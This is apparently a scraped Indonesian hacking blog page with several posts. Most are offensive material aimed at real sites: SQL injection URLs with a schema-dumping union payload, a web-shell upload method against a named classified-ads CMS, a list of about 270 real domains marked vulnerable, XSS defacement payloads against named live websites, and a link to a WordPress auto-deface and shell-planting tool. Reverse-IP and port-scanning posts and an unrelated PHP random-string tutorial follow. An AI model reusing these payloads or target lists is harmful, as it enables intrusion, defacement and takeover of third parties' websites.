hack CMS IKLAN BARIS

Assalamu’alaikum wr.wb..

Alhamdulillah bisa aktif lagy di underground hehehe..

Kali ini kk minato ingin mengajak kawan” berpesta sedikit :v .. yuk kita langung aja..

##############SQL CMS IKLAN BARIS#####################

# Dork :: inurl:“kategori.php?premium=” atau di kembangin lagy aja.. ;)

Vulnerable found at kategori.php

$id                          = $_GET['id'];

$id_kategori       = $_GET['kategori'];

$qryISI_kat         = select_db("kategori_iklan","*","id_kategori = '$id_kategori'");

$recISI_kat         = fetch_array($qryISI_kat);

$id_iklan_premium         = $_GET['premium'];

$id_iklan_gratis                                = $_GET['gratis'];

$qryISI_premium             = select_db("iklan_premium","*","id_iklan_premium = '$id_iklan_premium'");

$recISI_premium             = fetch_array($qryISI_premium);

$qryISI_gratis    = select_db("iklan_gratis","*","id_iklan_gratis = '$id_iklan_gratis'");

$recISI_gratis     = fetch_array($qryISI_gratis);

Terlihat tdk ada filter disana.. XD

Demo:

http://iklanbitcoin.com/kategori.php?kategori=3’

http://iklanbitcoin.com/kategori.php?kategori=3’+--+

http://iklanbitcoin.com/kategori.php?kategori=3’union+select+1,2,3+--+

vuln column di title,

 http://iklanbitcoin.com/kategori.php?kategori=3'and 0 union select 1,2,concat(0x3c2f7469746c653e3c613e,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)))-- -

#########arbitrary file upload CMS IKLAN BARIS ###################

File //iklan_gratis.php

                $img = $_FILES['gambar']['type'];

                                $imgtype = strtolower($img);

                                                /* if (($imgtype != "image/jpeg")&&($imgtype != "image/bmp")&&($imgtype != "image/gif")&&($imgtype != "image/x-png")){

                                                                alert('File gambar tidak dikenali!!!');

                                                } */

NB::Filternya dibuang sama programmernya XD

Demo::

http://iklanbitcoin.com/iklan_gratis.php

Pasang iklan gratis.. isi box terserah..

Lalu upload file dengan extensi,… shell.php.xxxjpg

Shell lokasi di http://iklanbitcoin.com/images/iklan_baris/shell.php.xxxjpg

Dibawah adalah target yg aku dapatin dr auto scanner ku.. selamat menikmati..lets rock (kita goyang) cms indoesia XD

1. bolamansion.com [NOT_FOUND]

2. afatogel.asia [NOT_FOUND]

3. afapoker.biz [NOT_FOUND]

4. 

5. iklanbet.com [ketemu]

6. iklangroups.com [ketemu]

7. iklansexy.com [NOT_FOUND]

8. iklanpoker.com [ketemu]

9. iklanmurah.net [ketemu]

10. iklan365.com [ketemu]

11. iklanforex.net [ketemu]

12. iklanbitcoin.com [ketemu]

13. iklanword.com [ketemu]

14. iklanbet.com [ketemu]

15. iklangroups.com [ketemu]

16. iklansexy.com [NOT_FOUND]

17. iklanpoker.com [ketemu]

18. iklanmurah.net [ketemu]

19. iklan365.com [ketemu]

20. iklanforex.net [ketemu]

21. iklanbitcoin.com [ketemu]

22. iklanword.com [ketemu]

23. iklanbet.com [ketemu]

24. iklangroups.com [ketemu]

25. iklansexy.com [NOT_FOUND]

26. iklanpoker.com [ketemu]

27. klanmurah.net [NOT_FOUND]

28. iklan365.com [ketemu]

29. iklanforex.net [ketemu]

30. iklanbitcoin.com [ketemu]

31. iklanword.com [ketemu]

32. megaiklan.com [ketemu]

33. mejatangkas.com [ketemu]

34. mentaripoker.us [NOT_FOUND]

35. nagaunik.com [NOT_FOUND]

36. permataiklan.com [ketemu]

37. pokernaga.us [NOT_FOUND]

38. poker228.in [NOT_FOUND]

39. pokerv.net [NOT_FOUND]

40. poker228.info [NOT_FOUND]

41. poker228.asia [NOT_FOUND]

42. poker88plus.com [ketemu]

43. poker88.in [NOT_FOUND]

44. pokerwoles.biz [NOT_FOUND]

45. pokerol.net [NOT_FOUND]

46. samkokbet.info [NOT_FOUND]

47. samkokbet.net [NOT_FOUND]

48. speediklan.com [ketemu]

49. visaiklan.com [ketemu]

50. gamespools.asia [NOT_FOUND]

51. bagusiklan.com [ketemu]

52. serviceiklan.com [NOT_FOUND]

53. pusatpoker.com [NOT_FOUND]

54. mesiniklan.com [ketemu]

55. kucingbirahi.com [NOT_FOUND]

56. karyaiklan.com [ketemu]

57. infotangkas.com [ketemu]

58. iklanbet.com [ketemu]

59. iklangroups.com [ketemu]

60. iklansexy.com [NOT_FOUND]

61. iklanpoker.com [ketemu]

62. iklanmurah.net [ketemu]

63. iklan365.com [ketemu]

64. iklanforex.net [ketemu]

65. iklanbitcoin.com [ketemu]

66. iklanword.com [ketemu]

67. iklanbet.com [ketemu]

68. iklangroups.com [ketemu]

69. iklansexy.com [NOT_FOUND]

70. iklanpoker.com [ketemu]

71. iklanmurah.net [ketemu]

72. iklan365.com [ketemu]

73. iklanforex.net [ketemu]

74. iklanbitcoin.com [ketemu]

75. iklanword.com [ketemu]

76. iklanbet.com [ketemu]

77. iklangroups.com [ketemu]

78. iklansexy.com [NOT_FOUND]

79. iklanpoker.com [ketemu]

80. iklanmurah.net [ketemu]

81. iklan365.com [ketemu]

82. iklanforex.net [ketemu]

83. iklanbitcoin.com [ketemu]

84. iklanword.com [ketemu]

85. iklanbet.com [ketemu]

86. iklangroups.com [ketemu]

87. iklansexy.com [NOT_FOUND]

88. iklanpoker.com [ketemu]

89. iklanmurah.net [ketemu]

90. iklan365.com [ketemu]

91. iklanforex.net [ketemu]

92. iklanbitcoin.com [ketemu]

93. iklanword.com [ketemu]

94. grandiklan.com [ketemu]

95. gejora.com [ketemu]

96. dewarezeki.com [NOT_FOUND]

97. dewamabuk.net [NOT_FOUND]

98. bursajual.com [NOT_FOUND]

99. rimbapoker.us [NOT_FOUND]

100. rgopoker.us [NOT_FOUND]

101. seoiklan.com [ketemu]

102. mejajudi.com [NOT_FOUND]

103. fujiforex.com [ketemu]

104. bejopoker.info [NOT_FOUND]

105. bejopoker.us [NOT_FOUND]

106. bejopoker.info [NOT_FOUND]

107. bejopoker.us [NOT_FOUND]

108. daunpoker.us [ketemu]

109. dewacasino.in [ketemu]

110. dewacasino.asia [NOT_FOUND]

111. dominobet.cc [NOT_FOUND]

112. dominobet.us [NOT_FOUND]

113. dominobet.me [NOT_FOUND]

114. jasapoker.asia [NOT_FOUND]

115. jasapoker.us [ketemu]

116. juaraqq.us [ketemu]

117. juarapoker.us [NOT_FOUND]

118. indoqq.us [NOT_FOUND]

119. juaraqq.us [ketemu]

120. juarapoker.us [NOT_FOUND]

121. lapak303.asia [NOT_FOUND]

122. loginpoker88.com [NOT_FOUND]

123. nagapoker.biz [NOT_FOUND]

124. nagapoker.asia [NOT_FOUND]

125. nagapoker.biz [NOT_FOUND]

126. nagapoker.asia [NOT_FOUND]

127. pokernaga.us [NOT_FOUND]

128. poker228.in [NOT_FOUND]

129. pokerv.net [NOT_FOUND]

130. poker228.info [NOT_FOUND]

131. poker228.asia [NOT_FOUND]

132. poker88plus.com [ketemu]

133. poker88.in [NOT_FOUND]

134. pokerwoles.biz [NOT_FOUND]

135. pokerol.net [NOT_FOUND]

136. pokernaga.us [NOT_FOUND]

137. poker228.in [NOT_FOUND]

138. pokerv.net [NOT_FOUND]

139. poker228.info [NOT_FOUND]

140. poker228.asia [NOT_FOUND]

141. poker88plus.com [ketemu]

142. poker88.in [NOT_FOUND]

143. pokerwoles.biz [NOT_FOUND]

144. pokerol.net [NOT_FOUND]

145. pokernaga.us [NOT_FOUND]

146. poker228.in [NOT_FOUND]

147. pokerv.net [NOT_FOUND]

148. poker228.info [NOT_FOUND]

149. poker228.asia [NOT_FOUND]

150. poker88plus.com [ketemu]

151. poker88.in [NOT_FOUND]

152. pokerwoles.biz [NOT_FOUND]

153. pokerol.net [NOT_FOUND]

154. pokernaga.us [NOT_FOUND]

155. poker228.in [NOT_FOUND]

156. pokerv.net [NOT_FOUND]

157. poker228.info [NOT_FOUND]

158. poker228.asia [NOT_FOUND]

159. poker88plus.com [ketemu]

160. poker88.in [NOT_FOUND]

161. pokerwoles.biz [NOT_FOUND]

162. pokerol.net [NOT_FOUND]

163. pokernaga.us [NOT_FOUND]

164. poker228.in [NOT_FOUND]

165. pokerv.net [NOT_FOUND]

166. poker228.info [NOT_FOUND]

167. poker228.asia [NOT_FOUND]

168. poker88plus.com [ketemu]

169. poker88.in [NOT_FOUND]

170. pokerwoles.biz [NOT_FOUND]

171. pokerol.net [NOT_FOUND]

172. pokernaga.us [NOT_FOUND]

173. poker228.in [NOT_FOUND]

174. pokerv.net [NOT_FOUND]

175. poker228.info [NOT_FOUND]

176. poker228.asia [NOT_FOUND]

177. poker88plus.com [ketemu]

178. poker88.in [NOT_FOUND]

179. pokerwoles.biz [NOT_FOUND]

180. pokerol.net [NOT_FOUND]

181. rgobet.info [NOT_FOUND]

182. rgobet.net [NOT_FOUND]

183. rgobet.us [NOT_FOUND]

184. rgobet.info [NOT_FOUND]

185. rgobet.net [NOT_FOUND]

186. rgobet.us [NOT_FOUND]

187. rgobet.info [NOT_FOUND]

188. rgobet.net [NOT_FOUND]

189. rgobet.us [NOT_FOUND]

190. rgotogel.us [NOT_FOUND]

191. samkokbet.info [NOT_FOUND]

192. samkokbet.net [NOT_FOUND]

193. sayapoker.us [ketemu]

194. togelplus.info [NOT_FOUND]

195. togelplus.net [NOT_FOUND]

196. totojitu.net [NOT_FOUND]

197. totojitu.us [NOT_FOUND]

198. jasapoker.asia [NOT_FOUND]

199. jasapoker.us [ketemu]

200. beritapoker.com [ketemu]

201. idpools.net [ketemu]

202. arwanapoker.us [ketemu]

203. dewacasino.in [ketemu]

204. dewacasino.asia [NOT_FOUND]

205. dewabitcoin.com [NOT_FOUND]

206. dewabatu.com [NOT_FOUND]

207. juraganiklan.com [ketemu]

208. juraganlink.com [ketemu]

209. juraganiklan.com [ketemu]

210. juraganlink.com [ketemu]

211. dewabitcoin.com [NOT_FOUND]

212. dewabatu.com [NOT_FOUND]

213. iklanbet.com [ketemu]

214. iklangroups.com [ketemu]

215. iklansexy.com [NOT_FOUND]

216. iklanpoker.com [ketemu]

217. iklanmurah.net [ketemu]

218. iklan365.com [ketemu]

219. iklanforex.net [ketemu]

220. iklanbitcoin.com [ketemu]

221. iklanword.com [ketemu]

222. mabukpoker.com [NOT_FOUND]

223. iklanbet.com [ketemu]

224. iklangroups.com [ketemu]

225. iklansexy.com [NOT_FOUND]

226. iklanpoker.com [ketemu]

227. iklanmurah.net [ketemu]

228. iklan365.com [ketemu]

229. iklanforex.net [ketemu]

230. iklanbitcoin.com [ketemu]

231. iklanword.com [ketemu]

232. listingbetting.com [NOT_FOUND]

233. pok3r88.com [NOT_FOUND]

234. bisnisgelap.com [ketemu]

235. pokernaga.us [NOT_FOUND]

236. poker228.in [NOT_FOUND]

237. pokerv.net [NOT_FOUND]

238. poker228.info [NOT_FOUND]

239. poker228.asia [NOT_FOUND]

240. poker88plus.com [ketemu]

241. poker88.in [NOT_FOUND]

242. pokerwoles.biz [NOT_FOUND]

243. pokerol.net [NOT_FOUND]

244. bolatangkasplus.com [ketemu]

245. culturalexpertise.com [ketemu]

246. culturacervejeira.com [ketemu]

247. lucchesigalati.com [ketemu]

248. vangeel-ips.com [ketemu]

249. mojotheater.com [ketemu]

250. gmchealth.com [ketemu]

251. bizimaraba.com [NOT_FOUND]

252. dewasurga.com [ketemu]

253. cushingacademylibrary.com [NOT_FOUND]

254. cushingacademy.net [NOT_FOUND]

255. norcatcard.com [ketemu]

256. sourceurban.com [ketemu]

257. internationalpsychoanalysis.org [NOT_FOUND]

258. dawsonstrategic.com [ketemu]

259. iklanbet.com [ketemu]

260. iklangroups.com [ketemu]

261. iklansexy.com [NOT_FOUND]

262. iklanpoker.com [ketemu]

263. iklanmurah.net [ketemu]

264. iklan365.com [ketemu]

265. iklanforex.net [ketemu]

266. iklanbitcoin.com [ketemu]

267. iklanword.com [ketemu]

268. frederictontweets.com [ketemu]

269. bluebuffalohg.com [ketemu]

270. culturalexpertise.com [ketemu]

271. ulturacervejeira.com [NOT_FOUND]

272. diurnalize.com [ketemu]

273. alexavegas.net [ketemu]

 tunggu update selanjutnya yh... bnyk rahasia yg akan kita kaji ^_^ 

salam dr keluarga  Sec7or

Read more

error.php XSS (Cross Site Scripting) Vulnerabilities 2016

error.php XSS (Cross Site Scripting) Vulnerabilities

Title : error.php XSS 

Risk : Cross site scripting, cookie Grabbing 

Poc : error.php?error=

Dork : "inurl:error.php?error="

Author : Minhal Mehdi (devilscafe.in)

browser : Mozilla Firefox 

error.php XSS (Cross Site Scripting) Vulnerabilities

1). Go to Google and now type the dork "inurl:error.php?error="

in search results ignore all the extra results with different URL Like : error-php-error.php

pick site with url www.site.com/error.php?error= Only..

2). Now Type your first Tag to Check the vulnerability 

example : www.site.com/error.php?error=<h1>Test</h1>

if it will show you "Test" word in Header tag this Its Vulnerable

Here are few ways in you you can inject your xss vector :) ..

How To show Header XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<h1>Hacked</h1>

To show header in center XSS injection:

http://www.sacareerfocus.co.za/error.php?error=<center><h1>Hacked</h1></center>

How to show Title XSS injection:

http://www.sacareerfocus.co.za/error.php?error=<title>Hacked</title>

How to Add a Image XSS injection:

http://www.sacareerfocus.co.za/error.php?error=<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbRsPwyz0WHjVvS9m-EE7xmkasRkwpLH-R-e_wavQ9gNje9ClsH6xNSckw1eGE9U2NGciJG9HzFia4upikWlxx2fD35fLI3chd1XMUe6xaeX_i55frSH-BKQ3tJCw_5f6UE7OHLTPUNiyR/s640/cats.jpg"/>

How to add a Message XSS injection: 

http://www.sacareerfocus.co.za/error.php?error=<p><b>Your Message Here<b></p>

How to write message in next lines XSS injection:

http://www.sacareerfocus.co.za/error.php?error=<p><b>First line<br>Second Line <b></p> 

How To add a scrolling Text XSS injection:

http://www.sacareerfocus.co.za/error.php?error=<marquee>Scrolling text Here</marquee>

How To Add a alert box XSS injection:

http://www.sacareerfocus.co.za/error.php?error=<script>alert("hello");</script>

How To add background colour in page XSS injection:

http://www.sacareerfocus.co.za/error.php?error=<body bgcolor="red"/>

How to Add a full deface Page XSS injection:

http://www.sacareerfocus.co.za/error.php?error=<title>Hacked</title><center><h1>hacked<h1><body bgcolor="red"/><p><b>You have been Hacked<br></b></p><img src="http://t0.gstatic.com/images?q=tbn:ANd9GcTN4uz2ifRTDefV_N7O2ZLEnyNfWb5TooIwqmZSwxOe_XH-8FksHA"/>

<marquee><b>www.thehackerstore.net</b></marquee>

you can add more html and javscript tags here,
here is another demo site : 

www.carrubbers.org/error.php?error=<center><h1>www.thehackerstore.net</h1></center>
find More website with dorks :)

if you have any queries feel free to comment below :)

Read more

Top 5 "Hacker" Friendly Operating Systems :Hello Everyone !! Most of my readers asked me Which is The Best Operating System for Doing Hacking Activities, such as Hacking websites, Wireless Networks, Passwords, Network Sniffing ,reverse engineering, application hacking and other encrypting and spoofing hacking. So I thought of writing an article on this... Today In this article I will be sharing some informations about awesome Hacking Operating Systems (OS) ;) ...

Top 5 Hacker Friendly Operating Systems 

Here is the list of Top 5 Hacker Friendly Operating Systems about which we are going to discuss.. 

1. Kali Linux
2. Backtrck 5
3. BugTraq
4. BlackBuntu
5. DEFT
   
   

Top 5 Hacker Friendly Operating Systems 

So lets come to our topic Top 5 Hacker Friendly Operating Systems. Below is the full list of top 5 Hacker friendly operating systems. If you are a Hacker you can use them and if not them can be by using them ;) .. so here it starts! ...

#1 Kali Linux

Kali Linux is based upon Debian Linux, rather than Ubuntu and new streamlined storehouses synchronize with the Debian vaults 4 times each day, continually furnishing clients with the most recent bundle upgrades and security fixes accessible.

With more than 300 penetration testing tools, totally free, Open source, Vast wireless gadget support, GPG marked bundles and repos, Multi-dialect, Completely adaptable make this appropriation one of the best accessible gem of hacking group.

You can Donload Kali Linux From the link given below :)

Download Kali Linux

NOTE: Default root password is same "root" :)

#2 BackTrack 5

Backtrack is a Linux OS intended for security experts. Who manages framework and web application security and different fields, for example, cyber crime scene investigation.

This Operating System includes all the security evaluations and elements till date.This distro got it all,Slick Interface,Powerful yet most recent tools,high perfectly substantial programming library,tons of instructional exercise. 

You can download Backtrack from below link.!

Download Backtrack5 

#3 BugTraq

BugTraq offers the most exhaustive dispersion, ideal, steady and programmed security to date. Bugtraq is an appropriation in light of the 2.6.38 part has an extensive variety of infiltration and legal apparatuses. Bugtraq can introduce from a Live DVD or USB drive, the circulation is tweaked to the last bundle, designed and redesigned the portion and the part has been fixed for better execution and to perceive an assortment of equipment, including remote infusion patches pentesting different disseminations don't perceive.

Administrative improvements of the system for better management of services. Extended the scope of acknowledgment for infusion remote drivers. Tools perfectly configured, automated installation scripts and tools like Nessus, OpenVAS, Greenbone, Nod32, Hashcat, Avira, BitDefender, ClamAV, Avast, AVG, etc...

Awesome Scripts from Bugtraq-Team (SVN upgrades devices, erase tracks, indirect accesses, Spyder-sql, and so on.) Stability and performance optimized: Enhanced execution blaze and java and begin cleansing superfluous administrations. So that the client can utilize just the administrations you truly need.  It has consolidated the formation of the client in the establishment, which is made with all framework designs.

Download BugTraq

4# BlackBuntu

Blackbuntu is dispersion for infiltration testing which was extraordinarily intended for security preparing understudies and professionals of data security. It's presently being assembled utilizing the xubuntu 12.04.This release has an extensive programming library and almost 100000's instructional exercises flying on YouTube and different locales. Blackbuntu keeps running on any PC,new or old,because of its less requirements.The Main developer,Krit Kadnok says "It's made time permitting as a hobby."Get Blackbuntu Here

Download BlackBuntu

#5 DEFT (Digital Evidence & Forensic Toolkit.)

DEFT (acronym for Digital Evidence and Forensic Toolkit) is a Xubuntu Linux-based Computer Forensics live CD. It is intended to meet police, agents, framework director and Computer Forensics authority's requirements.

DEFT Linux v5 depends on the new Kernel 2.6.31 (Linux side) and the DEFT Extra 2.0 (Computer Forensic GUI) with the best freeware Windows Computer Forensic instruments. DEFT it's another idea of Computer Forensic live framework that utilization LXDE as desktop environment and thunar document administrator and mount director as instrument for gadget administration.

It is a simple to utilize framework that incorporates an incredible equipment identification and the best free and open source applications committed to episode reaction and PC crime scene investigation.

DEFT is intended to be utilized by:

• police 
• examiners 
• framework executive 
• people 

and every one of the general population who need to utilize criminological instrument yet don't have the foggiest idea about the open source agent frameworks and the Forensic methods. Get This Swiss Knife of PC world Here

Download DEFT(Digital Evidence and Forensic Toolkit)

Read more

Config and Auto Deface in Worpdress

Config and Auto Deface in Wordpress..

ngk usah capek2 untuk nyari config + masuk ke database, ganti u\p admin, login, nanem shell, deface..

karena semua fitur itu ada di tool ini..
cuma 1x klik...



*nb:
ganti $nick.

klo token ngk ada.. berarti tinggalin aja..
klo token ada + ngk berhasil mepes.. coba lu pake manual..

http://pastebin.com/wALyu9Sx

video: https://youtu.be/_WWJFJJ3kdE

#

Read more

Script Auto Reverse IP Lookup With Python

Hai sob ...
Kali ini ane mau bagi script Auto Reverse IP Lookup With Python , jika pake web kan udah biasa tuh gimana kalau pakai script python kan luar biasa :p wkwkw  . Okey lanjut saja ..

Berikut Script nya

import urllib2
import re
import random


#Decoded by DayWalker
#Concat : rafsanzani.suhada99[at]gmail[dot]com
#Caranye
# Target : facebook.com <-- Target 



class reverse(object):
def run(self, target):
print ""
if target.startswith("http://"):
target = target.replace("http://", "")
elif target.startswith("https://"):
target = target.replace("https://", "")
else:
pass

url = "http://viewdns.info/reverseip/?host=%s&t=1" % (target)

try:
opener = urllib2.build_opener()
opener.addheaders = [('User-agent','Mozilla/5.0 (Mobile; rv:14.0) Gecko/14.0 Firefox/14.0')]
response = opener.open(url)
data = response.read()
comp = re.compile("<tr><td>\S+</td><td")
baglantilar = comp.findall(data)

for i in baglantilar:
i = i.replace("<tr><td>", "").replace("</td><td", "")

if i.startswith("http://"):
pass
else:
i = "http://"+i

if "Domain" not in i:
print i

except:
print "Something's went wrong .."
pass


if __name__ == '__main__':
a = raw_input("\n\t Target : ")
reverse().run(a)

print "\n IndoXploit Coders Team"
# Indoxploit Coders Team

SS testing :

Oke Terima kasih :)
DayWalker

Thx To : IndoXploit Coders Team | IDN-Crew | Madura Cyber Team |

Read more

Tutorial Generate Random String menggunakan PHP Script

Kali ini saya akan share cara membuat random string menggunakan bahasa php. Random string biasa digunakan untuk membuat kode kupn, konfirmasi, random password dll. Oke langsung saja ke tutorial.

1. Random String Berisikan Huruf Kecil dan Angka.

<?php
function random_string()
{
    $character_set_array = array();
    $character_set_array[] = array('count' => 7, 'characters' => 'abcdefghijklmnopqrstuvwxyz');
    $character_set_array[] = array('count' => 1, 'characters' => '0123456789');
    $temp_array = array();
    foreach ($character_set_array as $character_set) {
        for ($i = 0; $i < $character_set['count']; $i++) {
            $temp_array[] = $character_set['characters'][rand(0, strlen($character_set['characters']) - 1)];
        }
    }
    shuffle($temp_array);
    return implode('', $temp_array);
}
?> 

Simpan file tersebut dengan nama random.php .
Selanjutnya buat file lain dengan nama call.php dan isikan kode berikut :

<?php
include "random.php";
   $random = random_string(0);
 print ("$random");
?>

Cara panggilnya :
via terminal linux bisa ketikkan php call.php
Atau bisa juga di run lewat localhost.
Contoh output : rpca6unz
Terdiri dari 8 karakter dengan 7 huruf kecil dan 1 angka.

2. Random String Berisikan Huruf Kecil, Huruf besar, Simbol, dan Angka.

<?php
function random_string()
{
    $character_set_array = array();
    $character_set_array[] = array('count' => 5, 'characters' => 'abcdefghijklmnopqrstuvwxyz');
    $character_set_array[] = array('count' => 3, 'characters' => 'ABCDEFGHIJKLMNOPQRSTUVWXYZ');
    $character_set_array[] = array('count' => 2, 'characters' => '0123456789');
    $character_set_array[] = array('count' => 2, 'characters' => '!@#$+-*&?:');
    $temp_array = array();
    foreach ($character_set_array as $character_set) {
        for ($i = 0; $i < $character_set['count']; $i++) {
            $temp_array[] = $character_set['characters'][rand(0, strlen($character_set['characters']) - 1)];
        }
    }
    shuffle($temp_array);
    return implode('', $temp_array);
}
?>

Simpan dengan mana random.php lalu buat file call.php seperti nomor 1.
Contoh Output : q#Q?w22kaZfC
Terdiri dari 12 karakter dengan 5 huruf kecil, 3 huruf besar, 2 angka, dan 2 simbol.

Mudah bukan ?
Script diatas masih bisa dikembangkan sesuai kebutuhan, misal output hanya berupa simbol dan angka, huruf besar dan angka, dll.

Sekian tutor kali ini dan semoga bermanfaat.

Credit : Linux and Security

Read more

Cara Melihat Port Web Yang Terbuka Dengan PortScanner (Perl)

Hai Sob..
Kali ini saya akan share cara melihat port web yang terbuka dengan PortScanner (Perl) , Apa sih fungsinya ? kalau menurut saya sih fungsi nya kita bsa melihat port yang terbuka , contoh port 22 ? nah ini port 22 itu SSH , jadi kita bisa meromote web itu dengan ssh , ada juga yang 23 21 dll .


Toolsnya sedot DISINI UNTUK AMBIL

Pada bagian :

$ip = "localhost" ganti localhost dengan website(target) 

Ini hasil nya : 

 

Untuk ingin mengetahui nama nama portnya search aja ke google :p

Read more